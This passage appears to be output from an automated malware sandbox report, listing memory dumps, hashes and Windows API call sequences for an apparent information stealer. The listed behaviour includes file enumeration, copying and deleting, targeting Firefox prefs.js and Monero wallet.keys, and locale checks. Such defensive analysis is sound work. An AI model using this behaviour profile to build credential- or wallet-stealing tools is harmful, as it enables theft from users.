                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: prefs.js
                              • API String ID: 3334442632-3783873740
                              • Opcode ID: d222fa31615b2030bd86b649eee27197ab6b64461dddc63c816d649bf79b9b60
                              • Instruction ID: 3a9b12e7b7eb656574292ae50e9d79854e53069b81640732f7f908dac419dfb8
                              • Opcode Fuzzy Hash: d222fa31615b2030bd86b649eee27197ab6b64461dddc63c816d649bf79b9b60
                              • Instruction Fuzzy Hash: 5DB143719001099BDB28EF60DD97FED7379AF54304F4085ADA40A97181EF38AB49EF92
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD510C,?,?,?,00FD51B4,?,?,00000000,?,00000000), ref: 00FB1923
                              • StrCmpCA.SHLWAPI(?,00FD525C), ref: 00FB1973
                              • StrCmpCA.SHLWAPI(?,00FD5304), ref: 00FB1989
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00FB1D40
                              • DeleteFileA.KERNEL32(00000000), ref: 00FB1DCA
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FB1E20
                              • FindClose.KERNEL32(000000FF), ref: 00FB1E32
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 1415058207-1173974218
                              • Opcode ID: 1d388caaa9d0122fbd1d792587cd91265602980f4e53a031e98d81568b92e244
                              • Instruction ID: 838dbe4bf447caf1fb40172993dc19fa380b1cc96e80c5b1ee7f78dc0b74034d
                              • Opcode Fuzzy Hash: 1d388caaa9d0122fbd1d792587cd91265602980f4e53a031e98d81568b92e244
                              • Instruction Fuzzy Hash: E912C97191011D9BDB29EB60DD97FEE7378AF54304F4041ADA10A620D1EE387B89EF92
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00FD0C2E), ref: 00FBDE5E
                              • StrCmpCA.SHLWAPI(?,00FD14C8), ref: 00FBDEAE
                              • StrCmpCA.SHLWAPI(?,00FD14CC), ref: 00FBDEC4
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBE3E0
                              • FindClose.KERNEL32(000000FF), ref: 00FBE3F2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                              • String ID: \*.*
                              • API String ID: 2325840235-1173974218
                              • Opcode ID: 0718964c79f684fc0e41165f400d671ef5ee3902245c85df4b29f122702cffaa
                              • Instruction ID: a6a1d176a5b40724f01dea5b268f4a55d41ebc5e449bc8af8a7cd7f5e90c22c9
                              • Opcode Fuzzy Hash: 0718964c79f684fc0e41165f400d671ef5ee3902245c85df4b29f122702cffaa
                              • Instruction Fuzzy Hash: 47F17B7181411D9BDB29EB60DD96FEE7338AF14304F40419EA41A62091EE387F8ADE52
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FD14B0,00FD0C2A), ref: 00FBDAEB
                              • StrCmpCA.SHLWAPI(?,00FD14B4), ref: 00FBDB33
                              • StrCmpCA.SHLWAPI(?,00FD14B8), ref: 00FBDB49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBDDCC
                              • FindClose.KERNEL32(000000FF), ref: 00FBDDDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: d185a6a3605c785c718d3dbf2c0eb0d4a02fea9a85d7109c384bdf09fde5b6f5
                              • Instruction ID: 781241dea92b82b6a6f0ef1d4f8178c7771ebbae33a5db5e012e729e6c950df2
                              • Opcode Fuzzy Hash: d185a6a3605c785c718d3dbf2c0eb0d4a02fea9a85d7109c384bdf09fde5b6f5
                              • Instruction Fuzzy Hash: 6F9133729001099BCB14FB70ED57EED737DAF84304F40866CB81A96185FE38AB599F92
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ))hS$6z;:$E8c9$RP1V$YE[7$]OsK$e>?N$e>?N
                              • API String ID: 0-3514759201
                              • Opcode ID: 6cc4acb19336368849e6e086037920873febc0869d76b718f2e4b97bd2bc8227
                              • Instruction ID: 66cac64d02e8ef3a3b72486f641f2c4c01b05079da82204eb0ab4e09bd5e9cc2
                              • Opcode Fuzzy Hash: 6cc4acb19336368849e6e086037920873febc0869d76b718f2e4b97bd2bc8227
                              • Instruction Fuzzy Hash: 86B229F360C2109FE304AE2DEC8567AB7E9EFD8720F16463DEAC5C7744EA3558018696
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: (_$+}r7$:x;f$K|w]$Q |;$Ve_O$f2r?$Wz
                              • API String ID: 0-1382138061
                              • Opcode ID: 2161ea397cfa6be472f39b284c4f60c68704e13b33a45579b7249a7c857ef3ff
                              • Instruction ID: 5f7b7b2f1e05acd128a38de5cd6ed8759cee19c1c89c4d479ebe763b0c33a915
                              • Opcode Fuzzy Hash: 2161ea397cfa6be472f39b284c4f60c68704e13b33a45579b7249a7c857ef3ff
                              • Instruction Fuzzy Hash: C1B206F3A08204AFD3046E2DEC8567AFBE9EF94360F1A493DE6C4C3744E63598458697
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                              • GetKeyboardLayoutList.USER32(00000000,00000000,00FD05AF), ref: 00FC7BE1
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00FC7BF9
                              • GetKeyboardLayoutList.USER32(?,00000000), ref: 00FC7C0D
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FC7C62
                              • LocalFree.KERNEL32(00000000), ref: 00FC7D22
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 9e244e51b4f222332789c97875b9d8c26c2016ab79872bb70a1de21956ad4784
                              • Instruction ID: 260bee2255410e70c51aa9a7413246aa9d396ff66130991b575cf0e990f59ab0
                              • Opcode Fuzzy Hash: 9e244e51b4f222332789c97875b9d8c26c2016ab79872bb70a1de21956ad4784
                              • Instruction Fuzzy Hash: 4741287194021DABCB24EB94DD9AFEEB374FF44704F204199E40A62280DB786E85DFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 1Ss$CDwi$V?~$cn$|r'$}V=$y6
                              • API String ID: 0-1240672472
                              • Opcode ID: 2e833cfbcbe0ca32d1e319ab7ed37ba3ebb8ad05ac2096a2df49cbc2c28b2498
                              • Instruction ID: 8841d4a10be001472760665c40cf8e44207c17232714bfef9b7e7d6d20b94ff1
                              • Opcode Fuzzy Hash: 2e833cfbcbe0ca32d1e319ab7ed37ba3ebb8ad05ac2096a2df49cbc2c28b2498
                              • Instruction Fuzzy Hash: 78B24BF3A082109FE704AE2DEC8577ABBDAEFD4760F1A463DEAC4C3744E53558058692
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: #z>$0L^g$Ao[$Pgh$@>9$Ki$|}
                              • API String ID: 0-3120634388
                              • Opcode ID: 5649b266c3f81ee6bb9ff597a53abb357586505ac0a18af3c0a5a2c102b6d3ad
                              • Instruction ID: 49ffffac6d890bd2f76d7e26151597dc88383c99630bdf025c0fae23631e28de
                              • Opcode Fuzzy Hash: 5649b266c3f81ee6bb9ff597a53abb357586505ac0a18af3c0a5a2c102b6d3ad
                              • Instruction Fuzzy Hash: F9B218F360C2049FE704AE2DEC8577ABBE5EB94320F1A893DE6C4C7744E63598058697
                              APIs
                                • Part of subcall function 00FCA740: lstrcpy.KERNEL32(00FD0E17,00000000), ref: 00FCA788
                                • Part of subcall function 00FCA920: lstrcpy.KERNEL32(00000000,?), ref: 00FCA972
                                • Part of subcall function 00FCA920: lstrcat.KERNEL32(00000000), ref: 00FCA982
                                • Part of subcall function 00FCA9B0: lstrlen.KERNEL32(?,00DE8DF8,?,\Monero\wallet.keys,00FD0E17), ref: 00FCA9C5
                                • Part of subcall function 00FCA9B0: lstrcpy.KERNEL32(00000000), ref: 00FCAA04
                                • Part of subcall function 00FCA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FCAA12
                                • Part of subcall function 00FCA8A0: lstrcpy.KERNEL32(?,00FD0E17), ref: 00FCA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00FD0D73), ref: 00FBE4A2
                              • StrCmpCA.SHLWAPI(?,00FD14F8), ref: 00FBE4F2
                              • StrCmpCA.SHLWAPI(?,00FD14FC), ref: 00FBE508
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00FBEBDF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                              • String ID: \*.*
                              • API String ID: 433455689-1173974218
                              • Opcode ID: a51d0747d230651e89888983a3afca229691636028b58f4fa7167105c69008ac
                              • Instruction ID: 96b60b4fbba8590df5cec64286f08ba594b34628a92ccd20b1e02c87bbb87fea
                              • Opcode Fuzzy Hash: a51d0747d230651e89888983a3afca229691636028b58f4fa7167105c69008ac
                              • Instruction Fuzzy Hash: 3412197191011D9BDB28FB60DE97FED7339AF54304F4041ADA50A921C1EE386F49EBA2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1292119763.000000000120E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                              • Associated: 00000000.00000002.1291959440.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001061000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.000000000106D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.0000000001092000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1291975250.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000013AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.000000000148E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292119763.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292356432.00000000014CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292474851.0000000001676000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1292490179.0000000001677000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
